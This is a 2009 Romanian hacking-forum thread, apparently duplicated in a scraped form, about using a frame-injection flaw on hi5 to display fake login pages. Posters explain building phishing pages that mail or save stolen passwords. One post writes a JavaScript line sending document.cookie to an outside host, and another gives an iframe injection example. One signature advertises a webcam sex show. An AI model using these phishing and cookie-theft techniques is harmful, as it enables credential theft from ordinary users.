HI5 va ajuta sa faceti scam - Romanian Security Team

loki · 11-05-2009, 02:23 PM

[Doar userii inregistrati pot vedea linkurile. ] [Doar userii inregistrati pot vedea linkurile. ]

Nu am gasit demult din astea. Da chiar hi5? rushine!
Vreau sa mai studiez problema, presupun ca e frame, nu RFI (ar fi chiar rushine sa scape asa ceva). Nu merge javascript:link.
Ce frumos merge dupa header un scam page de login hi5, cine s-ar prinde?

p3tru · 11-05-2009, 02:45 PM

lasa ca ii bine...

)

Azrael-sub7 · 11-05-2009, 11:07 PM

Presupunand ca e intr-un wide fixat s-ar cam prinde lumea ... acum depinde .. , oricum javascript: nu e acceptat de toate browserele , si sunt curios chiar , nu inteleg ai folosit javascript: asa ca protocol ? ca aia cred ca ar fi o nulitate , sau ai gasit o variabila ceva care accepta javascript , pentru ca dupa cate stiu eu cand apelezi javascript: in browser nu faci altceva decat sa folosesti o functie de inserare javascript de la firefox , care are multe restrictii , nu de alta dar as vrea sa inteleg pentru ca daca folosesc obiectul document pot sa fac orice pagina cum vreau din js , dar asta nu inseamna ca e o vulnerabilitate nu ? ; sau ce ai pus e de fapt un xss ? ...
Nu stiu habar nu am interb si eu ...

Azrael-sub7 · 11-06-2009, 07:40 AM

@balack
Concret vrei sa spui cookie stelear , prin xss , da esti tare ce sa zic stai aici si cauti cate un xss pe yahoo pana iti curg balele ... oricum eu yahoo-ul il folosesc doar pt id de mess conturile importante le tin pe @satanic.ro daca vrei ceva calumea gaseste acolo xss da oricum nici macar nu le gasesti tu dar ce conteaza ... , nu esti cumva tu ala care vinde steamuri , si alte chesti furate prin xss , scam si phishing si alte metode imorale si jalnice ? Hai ca e plin netu de posturi de ale tale cu astfel de oferte mie mi ar fi rusine in locul tau , eu pur si simplu incerc sa port o discutie din care sa aflu ceva nou , daca tie ti se pare ca epatez nu vreau sa ma pronunt , si vezi ca nu e indicat sa faci flame ...
Si vezi ca stereotipul " geniu malefic " am impresia ca e luat din desene animate , vezi ca te influenteaza ...

loki · 11-06-2009, 09:25 AM

E doar un simplu frame. Nu preia cookie, nu e xss. Dupa cum am precizat poate fi folosit pentru scam.

La javascript m-am referit mai simplu: ma grabeam, doream sa zic sa mearga javascript:comanda in loc de link. Nu protocoale sau programare si apropo javascript e acceptat de toate browserele ca de el depind cookie-urile si sesiunile, nu vad cum ai putea fi logat undeva cu acel browser. Despre restrictii te referi la diferenta dintre javascriptul din browser si limbajul java (scripturile jar)?

Azrael-sub7 · 11-06-2009, 09:40 AM

Nu , eu spun ca " javascript: " e un protocol in firefox la fel cum e si " ftp:" etc , adica daca scrii la adresa javascript:alert("lalala"); o sa iti execute alertul daca dai javascript:alert("document.cookie"); pe orice site in care esti iti va printa cookiurile , ideea e ca chestia asta nu merge si pe IE de exemplu , la asta ma refeream oricum acum m ai lamurit e vorba de un iframe si oricum ce sens are sa faci un scam page in care ai un ditamai $_GET , oricine s-ar prinde scamurile cele mai bune dupa mine sunt cele care sunt in firefox -> ctrl+u,ctrl+a,ctrl+c,ctrl+v(in o pagina scam),si schimbat doar tagurile de form si (input optional daca ai un manager de scam pages ) , si ideea e ca adresa sa apara exact ca cea adevarata numai ca nu este normal asta nu se poate decat prin infectare cu un exe ceva , dar in opinia mea asta e scamul perfect restul sunt usor de detectat ..

si vorbeam de restrictii pt ca nu se poate face de exemplu javascript:var c = document.cookie; window.open("http://la.ro?lala="+c); ..

loki · 11-06-2009, 09:50 AM

merge si pe IE chiar foarte bine.
doar ca au protejat IE8 (sau IE7) la tentativele de xss: iti intrerupe cuvantul javascript daca apare in link.

vbscript nu merge pe toate browserele, mi se pare ca merge doar in IE.

Oof normal ca scam-urile prin definitie nu au linkul original (altfel se zice site spart). Daca te uiti pe emailurile hi5 link-ul de mai sus e chiar mai scurt decat cele trimise de ei. Pe mail se trimite un link sa dea omu click, nu il prostesti sa scrie el de mana adresa. Cati nu au pus botul la invitatii cu link hi5.net...
Si da, poti face copy-paste intr-un php, stergi headerul si directezi pagina de sus spre php-ul ala care da mail, salveaza parole pe disc etc. asta e ideea.

Azrael-sub7 · 11-06-2009, 10:01 AM

Ciudat mie nu mi a mers niciodata javascript: ( nici un fel de alert nimic ) in IE , si aveam 7 sau 8 ... dar o sa mai incerc de curiozitate acum nu am cum ...

Pai scamurile pot sa aiba si link-ul original daca ai "infectat" o victima asta am incercat sa spun in restul cazurilor nici nu imi trecea prin cap ca are cum apara link-ul real , ma rog mai exista o modalitate , dar depinde de browser , sa stergi adressbarul - la versiun IE mai vechi se permite si sa faci altul fals cu un text la misto dar din experienta mea se vede de la o posta ca e un adresbar fals ...

Pai cine crezi ca se uita la link ? toata lumea se uia unde te duce(href) ... ca apare la majoritatea browserelor cand faci mouseover pe link

Nemessis · 11-06-2009, 10:40 AM

loki nu privesti problema cum trebuie. Daca accepta iframe atunci poti injecta scriptul tau in pagina ta, care va fi injectata prin iframe. Exemplu: pe profilul de hi5 injectezi asa <iframe src=http://site.com/a.html> unde a.html contine javascript. Nu ai ce face cu cookie de hi5, eventual poti afla mailul de pe care s-au facut conturile si asta nu merge intotdeauna dintr-un motiv care ma depaseste.

In fine, asta e cea mai mica problema a lor. Inca mai au probleme cu xss-uri permanente in profil.

@Azrael - injectarea de frame-uri intra in categoria xss

@ballack - si eu m-am ars cu un cookie stealer. Shit happens. Nu e o rusine. Pe adresa folosita ca id cred ca am fost ars de o gramada de ori dar nu prea mi-a pasat pentru ca nu am decat mii de spamuri primite, iar pe id nu dau doi bani.

loki · 11-06-2009, 01:10 PM

waai! svfu cu offtopicu vostru de stealere, lasati-mi threadul in pace si mutati-va in alta parte!

11-05-2009, 02:23 PM	#1 (permalink)
loki Moderator Cultul betivilor Join Date: Feb 2008 Posts: 2,393 Rep Power: 5	HI5 va ajuta sa faceti scam hotel regim hotelier hotel yahoo domain [Doar userii inregistrati pot vedea linkurile. ] [Doar userii inregistrati pot vedea linkurile. ] Nu am gasit demult din astea. Da chiar hi5? rushine! Vreau sa mai studiez problema, presupun ca e frame, nu RFI (ar fi chiar rushine sa scape asa ceva). Nu merge javascript:link. Ce frumos merge dupa header un scam page de login hi5, cine s-ar prinde? __________________

Last edited by loki; 11-05-2009 at 03:06 PM.

11-05-2009, 02:45 PM	#2 (permalink)
p3tru Registered user Bautor de gin Join Date: Apr 2009 Posts: 176 Rep Power: 1	lasa ca ii bine... ) __________________ Read rules before you press reply: HERE

11-06-2009, 09:25 AM	#5 (permalink)
loki Moderator Cultul betivilor Join Date: Feb 2008 Posts: 2,393 Rep Power: 5	E doar un simplu frame. Nu preia cookie, nu e xss. Dupa cum am precizat poate fi folosit pentru scam. La javascript m-am referit mai simplu: ma grabeam, doream sa zic sa mearga javascript:comanda in loc de link. Nu protocoale sau programare si apropo javascript e acceptat de toate browserele ca de el depind cookie-urile si sesiunile, nu vad cum ai putea fi logat undeva cu acel browser. Despre restrictii te referi la diferenta dintre javascriptul din browser si limbajul java (scripturile jar)? __________________

11-06-2009, 09:50 AM	#7 (permalink)
loki Moderator Cultul betivilor Join Date: Feb 2008 Posts: 2,393 Rep Power: 5	merge si pe IE chiar foarte bine. doar ca au protejat IE8 (sau IE7) la tentativele de xss: iti intrerupe cuvantul javascript daca apare in link. vbscript nu merge pe toate browserele, mi se pare ca merge doar in IE. Oof normal ca scam-urile prin definitie nu au linkul original (altfel se zice site spart). Daca te uiti pe emailurile hi5 link-ul de mai sus e chiar mai scurt decat cele trimise de ei. Pe mail se trimite un link sa dea omu click, nu il prostesti sa scrie el de mana adresa. Cati nu au pus botul la invitatii cu link hi5.net... Si da, poti face copy-paste intr-un php, stergi headerul si directezi pagina de sus spre php-ul ala care da mail, salveaza parole pe disc etc. asta e ideea. __________________

11-06-2009, 10:40 AM	#9 (permalink)
Nemessis Administrator Cultul betivilor Join Date: Jul 2006 Posts: 2,922 Rep Power: 10	loki nu privesti problema cum trebuie. Daca accepta iframe atunci poti injecta scriptul tau in pagina ta, care va fi injectata prin iframe. Exemplu: pe profilul de hi5 injectezi asa <iframe src=http://site.com/a.html> unde a.html contine javascript. Nu ai ce face cu cookie de hi5, eventual poti afla mailul de pe care s-au facut conturile si asta nu merge intotdeauna dintr-un motiv care ma depaseste. In fine, asta e cea mai mica problema a lor. Inca mai au probleme cu xss-uri permanente in profil. @Azrael - injectarea de frame-uri intra in categoria xss @ballack - si eu m-am ars cu un cookie stealer. Shit happens. Nu e o rusine. Pe adresa folosita ca id cred ca am fost ars de o gramada de ori dar nu prea mi-a pasat pentru ca nu am decat mii de spamuri primite, iar pe id nu dau doi bani. __________________ Contact: nu ma contactati prin mesaje private ca nu le citesc. Blog personal: http://gandestevito.blogspot.com Ethical Hacking: http://hackpedia.info Vreti sa vorbiti cu o zdreanta ordinara? Dati add la id-ul honey_andrada si spuneti-i ca v-am trimis eu sa va faca show moka pe webcam. Fata executa rapid orice ii cereti

11-05-2009, 11:07 PM	#3 (permalink)
Azrael-sub7 Registered Users Bautor de bere Join Date: Jul 2008 Posts: 30 Rep Power: 0	Presupunand ca e intr-un wide fixat s-ar cam prinde lumea ... acum depinde .. , oricum javascript: nu e acceptat de toate browserele , si sunt curios chiar , nu inteleg ai folosit javascript: asa ca protocol ? ca aia cred ca ar fi o nulitate , sau ai gasit o variabila ceva care accepta javascript , pentru ca dupa cate stiu eu cand apelezi javascript: in browser nu faci altceva decat sa folosesti o functie de inserare javascript de la firefox , care are multe restrictii , nu de alta dar as vrea sa inteleg pentru ca daca folosesc obiectul document pot sa fac orice pagina cum vreau din js , dar asta nu inseamna ca e o vulnerabilitate nu ? ; sau ce ai pus e de fapt un xss ? ... Nu stiu habar nu am interb si eu ...

11-06-2009, 07:40 AM	#4 (permalink)
Azrael-sub7 Registered Users Bautor de bere Join Date: Jul 2008 Posts: 30 Rep Power: 0	@balack Concret vrei sa spui cookie stelear , prin xss , da esti tare ce sa zic stai aici si cauti cate un xss pe yahoo pana iti curg balele ... oricum eu yahoo-ul il folosesc doar pt id de mess conturile importante le tin pe @satanic.ro daca vrei ceva calumea gaseste acolo xss da oricum nici macar nu le gasesti tu dar ce conteaza ... , nu esti cumva tu ala care vinde steamuri , si alte chesti furate prin xss , scam si phishing si alte metode imorale si jalnice ? Hai ca e plin netu de posturi de ale tale cu astfel de oferte mie mi ar fi rusine in locul tau , eu pur si simplu incerc sa port o discutie din care sa aflu ceva nou , daca tie ti se pare ca epatez nu vreau sa ma pronunt , si vezi ca nu e indicat sa faci flame ... Si vezi ca stereotipul " geniu malefic " am impresia ca e luat din desene animate , vezi ca te influenteaza ...

11-06-2009, 09:40 AM	#6 (permalink)
Azrael-sub7 Registered Users Bautor de bere Join Date: Jul 2008 Posts: 30 Rep Power: 0	Nu , eu spun ca " javascript: " e un protocol in firefox la fel cum e si " ftp:" etc , adica daca scrii la adresa javascript:alert("lalala"); o sa iti execute alertul daca dai javascript:alert("document.cookie"); pe orice site in care esti iti va printa cookiurile , ideea e ca chestia asta nu merge si pe IE de exemplu , la asta ma refeream oricum acum m ai lamurit e vorba de un iframe si oricum ce sens are sa faci un scam page in care ai un ditamai $_GET , oricine s-ar prinde scamurile cele mai bune dupa mine sunt cele care sunt in firefox -> ctrl+u,ctrl+a,ctrl+c,ctrl+v(in o pagina scam),si schimbat doar tagurile de form si (input optional daca ai un manager de scam pages ) , si ideea e ca adresa sa apara exact ca cea adevarata numai ca nu este normal asta nu se poate decat prin infectare cu un exe ceva , dar in opinia mea asta e scamul perfect restul sunt usor de detectat .. si vorbeam de restrictii pt ca nu se poate face de exemplu javascript:var c = document.cookie; window.open("http://la.ro?lala="+c); ..

11-06-2009, 10:01 AM	#8 (permalink)
Azrael-sub7 Registered Users Bautor de bere Join Date: Jul 2008 Posts: 30 Rep Power: 0	Ciudat mie nu mi a mers niciodata javascript: ( nici un fel de alert nimic ) in IE , si aveam 7 sau 8 ... dar o sa mai incerc de curiozitate acum nu am cum ... Pai scamurile pot sa aiba si link-ul original daca ai "infectat" o victima asta am incercat sa spun in restul cazurilor nici nu imi trecea prin cap ca are cum apara link-ul real , ma rog mai exista o modalitate , dar depinde de browser , sa stergi adressbarul - la versiun IE mai vechi se permite si sa faci altul fals cu un text la misto dar din experienta mea se vede de la o posta ca e un adresbar fals ... Pai cine crezi ca se uita la link ? toata lumea se uia unde te duce(href) ... ca apare la majoritatea browserelor cand faci mouseover pe link

11-06-2009, 01:10 PM	#10 (permalink)
loki Moderator Cultul betivilor Join Date: Feb 2008 Posts: 2,393 Rep Power: 5	waai! svfu cu offtopicu vostru de stealere, lasati-mi threadul in pace si mutati-va in alta parte! __________________